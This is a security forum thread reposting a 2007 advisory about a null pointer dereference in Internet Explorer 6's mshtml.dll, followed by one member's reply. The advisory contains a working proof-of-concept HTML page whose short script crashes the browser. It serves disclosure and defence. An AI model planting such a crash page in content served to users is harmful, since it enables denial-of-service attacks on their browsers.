English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits MS IE 6 Null Pointer Dereference Exploit (mshtml.dll)  XML
  [Announcement]   MS IE 6 Null Pointer Dereference Exploit (mshtml.dll) 08/02/2007 20:02:57 (+0700) | #1 | 40703
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
------------------------------------------------------------------------


SUMMARY
Microsoft Internet Explorer version 6 crashes when you open the attached
HTML page, this is due to its attempt to dereference a NULL pointer.

DETAILS
Vulnerable Systems:
* Microsoft Internet Explorer version 6.0.2800.1106; SP1 (Windows 2000
Advanced Server)
* Microsoft Internet Explorer version 6.0.2900.2180.xpsp.050928-1517;SP2
(Windows XP Pro)

Exploit:
<!--
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer
Dereference Vulnerability (mshtml.dll) (0-day)

+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo
Park - amesianx@gmail.com)

+ Critical: Critical

+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)

+ Where: From remote

+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server
(Korean Language)

+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1
(Windows 2000 Advanced Server)
Microsoft Internet Explorer
Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)

+ Solution: Not Patched (zero-day)

+ Description:
The following bug was tested on the latest version of Internet Explorer
6 on a fully-patched
Windows XP SP2 system. this bug will crash when executing a 'for'
scripts.

+ The following proof-of-concept is also available:
<http://www.powerhacker.net/exploit/IE_NULL_CRASH.html>
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->

Code:
<html>
 <head>
  <title> AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, 
RC_No1@gmail.com)</title>
 </head>
 <body>
  <script language='javascript'>
   var data = document['getElementById'];
   for(var key in data);
  </script>
 </body>
</html>



ADDITIONAL INFORMATION
The original article can be found at:
<hxxp://www.milw0rm.com/exploits/3272>
hxxp://www.milw0rm.com/exploits/3272
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Question]   Re:MS IE 6 Null Pointer Dereference Exploit (mshtml.dll) 08/02/2007 20:26:51 (+0700) | #2 | 40704
ivanut
Member
[Minus]    0    [Plus]
Joined: 04/02/2007 06:24:20
Messages: 10
Location: Mos
Offline
[Profile] [PM] [Yahoo!]
Đệ chẳng hiểu mô tê gì cả huynh ơi :?)
Hì nhưng mà đệ khoái đọc các bài mà huynh viết lém smilie)
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|